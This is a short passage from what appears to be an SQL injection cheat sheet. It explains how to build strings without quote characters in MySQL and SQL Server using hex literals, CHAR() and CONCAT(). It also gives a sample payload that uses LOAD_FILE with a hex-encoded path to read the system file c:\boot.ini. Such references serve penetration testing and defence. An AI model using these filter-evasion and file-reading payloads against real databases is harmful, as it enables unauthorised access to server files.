Strings without Quotes
These are some direct ways to using strings but it’s always possible to use
CHAR()
(MS) and CONCAT()
(M) to generate string without quotes.0x457578
(M) - Hex Representation of string
SELECT 0x457578
This will be selected as string in MySQL.
In MySQL easy way to generate hex representations of strings use this;
SELECT CONCAT('0x',HEX('c:\\boot.ini'))
- Using
CONCAT()
in MySQL
SELECT CONCAT(CHAR(75),CHAR(76),CHAR(77))
(M)
This will return ‘KLM’.
SELECT CHAR(75)+CHAR(76)+CHAR(77)
(S)
This will return ‘KLM’.
Hex based SQL Injection Samples
SELECT LOAD_FILE(0x633A5C626F6F742E696E69)
(M)
This will show the content of c:\boot.ini